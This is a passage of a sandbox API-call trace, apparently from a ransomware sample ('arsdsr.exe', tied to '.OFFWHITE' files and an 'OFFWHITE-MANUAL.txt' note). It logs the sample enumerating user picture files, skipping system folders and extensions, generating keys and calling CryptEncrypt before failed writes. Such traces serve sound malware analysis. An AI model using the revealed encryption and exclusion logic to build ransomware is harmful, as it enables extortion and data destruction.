[0146.685] SystemFunction036 (in: RandomBuffer=0x546b00, RandomBufferLength=0x10 | out: RandomBuffer=0x546b00) returned 1 [0146.685] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.685] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.685] SystemFunction036 (in: RandomBuffer=0x546ae8, RandomBufferLength=0x10 | out: RandomBuffer=0x546ae8) returned 1 [0146.685] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.685] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.685] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5607e0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5607e0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.685] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.685] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.685] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5608e8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5608e8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.686] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.686] SetLastError (dwErrCode=0x0) [0146.686] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5607e0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.686] GetLastError () returned 0x6 [0146.686] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb5a2927, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2=".") returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="..") returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="...") returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="windows") returned -1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="$recycle.bin") returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="rsa") returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="ntuser.dat") returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="programdata") returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="appdata") returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="program files") returned 1 [0146.686] lstrcmpiW (lpString1="usertile11.bmp", lpString2="program files (x86)") returned 1 [0146.686] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.686] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile11.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" [0146.686] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.686] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.686] PathFindExtensionW (pszPath="usertile11.bmp") returned=".bmp" [0146.686] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.686] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.686] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.686] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.686] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.686] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.686] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.686] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.687] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.687] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.687] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.687] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.687] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.687] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.687] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.687] lstrcmpiW (lpString1="usertile11.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.687] GetProcessHeap () returned 0x500000 [0146.687] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546fb8 [0146.687] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.687] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.687] GetProcessHeap () returned 0x500000 [0146.687] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546b18 [0146.687] GetProcessHeap () returned 0x500000 [0146.687] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546b30 [0146.687] GetProcessHeap () returned 0x500000 [0146.687] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5609f0 [0146.687] GetProcessHeap () returned 0x500000 [0146.687] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x560af8 [0146.688] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.688] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.688] SystemFunction036 (in: RandomBuffer=0x546b18, RandomBufferLength=0x10 | out: RandomBuffer=0x546b18) returned 1 [0146.688] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.688] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.688] SystemFunction036 (in: RandomBuffer=0x546b30, RandomBufferLength=0x10 | out: RandomBuffer=0x546b30) returned 1 [0146.688] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.688] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.688] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5609f0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5609f0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.688] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.688] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.688] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x560af8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x560af8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.688] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.688] SetLastError (dwErrCode=0x0) [0146.688] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5609f0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.688] GetLastError () returned 0x6 [0146.688] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2755d1, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2755d1, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb6d3417, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2=".") returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="..") returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="...") returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="windows") returned -1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="$recycle.bin") returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="rsa") returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="ntuser.dat") returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="programdata") returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="appdata") returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="program files") returned 1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="program files (x86)") returned 1 [0146.689] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.689] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile12.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" [0146.689] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.689] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.689] PathFindExtensionW (pszPath="usertile12.bmp") returned=".bmp" [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.689] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.689] lstrcmpiW (lpString1="usertile12.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.689] GetProcessHeap () returned 0x500000 [0146.689] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546fc8 [0146.690] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.690] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.690] GetProcessHeap () returned 0x500000 [0146.690] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546b48 [0146.690] GetProcessHeap () returned 0x500000 [0146.690] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546b60 [0146.690] GetProcessHeap () returned 0x500000 [0146.690] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x560c00 [0146.690] GetProcessHeap () returned 0x500000 [0146.690] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x560d08 [0146.690] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.690] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.690] SystemFunction036 (in: RandomBuffer=0x546b48, RandomBufferLength=0x10 | out: RandomBuffer=0x546b48) returned 1 [0146.690] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.690] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.690] SystemFunction036 (in: RandomBuffer=0x546b60, RandomBufferLength=0x10 | out: RandomBuffer=0x546b60) returned 1 [0146.690] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.690] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.690] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x560c00*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x560c00*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.690] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.690] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.690] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x560d08*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x560d08*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.691] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.691] SetLastError (dwErrCode=0x0) [0146.691] WriteFile (in: hFile=0xffffffff, lpBuffer=0x560c00, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.691] GetLastError () returned 0x6 [0146.691] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae29b72e, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae29b72e, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb76b98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2=".") returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="..") returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="...") returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="windows") returned -1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="$recycle.bin") returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="rsa") returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="ntuser.dat") returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="programdata") returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="appdata") returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="program files") returned 1 [0146.691] lstrcmpiW (lpString1="usertile13.bmp", lpString2="program files (x86)") returned 1 [0146.691] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.691] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile13.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" [0146.691] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.691] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.691] PathFindExtensionW (pszPath="usertile13.bmp") returned=".bmp" [0146.691] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.691] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.691] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.691] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.691] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.692] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.692] lstrcmpiW (lpString1="usertile13.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.692] GetProcessHeap () returned 0x500000 [0146.692] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546fd8 [0146.692] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.692] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.692] GetProcessHeap () returned 0x500000 [0146.692] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546b78 [0146.692] GetProcessHeap () returned 0x500000 [0146.692] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546b90 [0146.692] GetProcessHeap () returned 0x500000 [0146.692] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x560e10 [0146.693] GetProcessHeap () returned 0x500000 [0146.693] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x560f18 [0146.693] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.693] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.693] SystemFunction036 (in: RandomBuffer=0x546b78, RandomBufferLength=0x10 | out: RandomBuffer=0x546b78) returned 1 [0146.693] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.693] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.693] SystemFunction036 (in: RandomBuffer=0x546b90, RandomBufferLength=0x10 | out: RandomBuffer=0x546b90) returned 1 [0146.693] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.693] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.693] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x560e10*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x560e10*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.693] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.693] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.693] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x560f18*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x560f18*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.693] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.693] SetLastError (dwErrCode=0x0) [0146.694] WriteFile (in: hFile=0xffffffff, lpBuffer=0x560e10, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.694] GetLastError () returned 0x6 [0146.694] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb82a065, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2=".") returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="..") returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="...") returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="windows") returned -1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="$recycle.bin") returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="rsa") returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="ntuser.dat") returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="programdata") returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="appdata") returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="program files") returned 1 [0146.694] lstrcmpiW (lpString1="usertile14.bmp", lpString2="program files (x86)") returned 1 [0146.694] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.694] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile14.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" [0146.694] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.694] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.694] PathFindExtensionW (pszPath="usertile14.bmp") returned=".bmp" [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.694] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.695] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.695] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.695] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.695] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.695] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.695] lstrcmpiW (lpString1="usertile14.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.695] GetProcessHeap () returned 0x500000 [0146.695] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546fe8 [0146.695] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.698] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.698] GetProcessHeap () returned 0x500000 [0146.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546ba8 [0146.698] GetProcessHeap () returned 0x500000 [0146.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546bc0 [0146.698] GetProcessHeap () returned 0x500000 [0146.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561020 [0146.698] GetProcessHeap () returned 0x500000 [0146.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561128 [0146.698] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.699] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.699] SystemFunction036 (in: RandomBuffer=0x546ba8, RandomBufferLength=0x10 | out: RandomBuffer=0x546ba8) returned 1 [0146.699] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.699] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.699] SystemFunction036 (in: RandomBuffer=0x546bc0, RandomBufferLength=0x10 | out: RandomBuffer=0x546bc0) returned 1 [0146.699] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.699] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.699] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561020*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x561020*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.699] lstrcmpiW 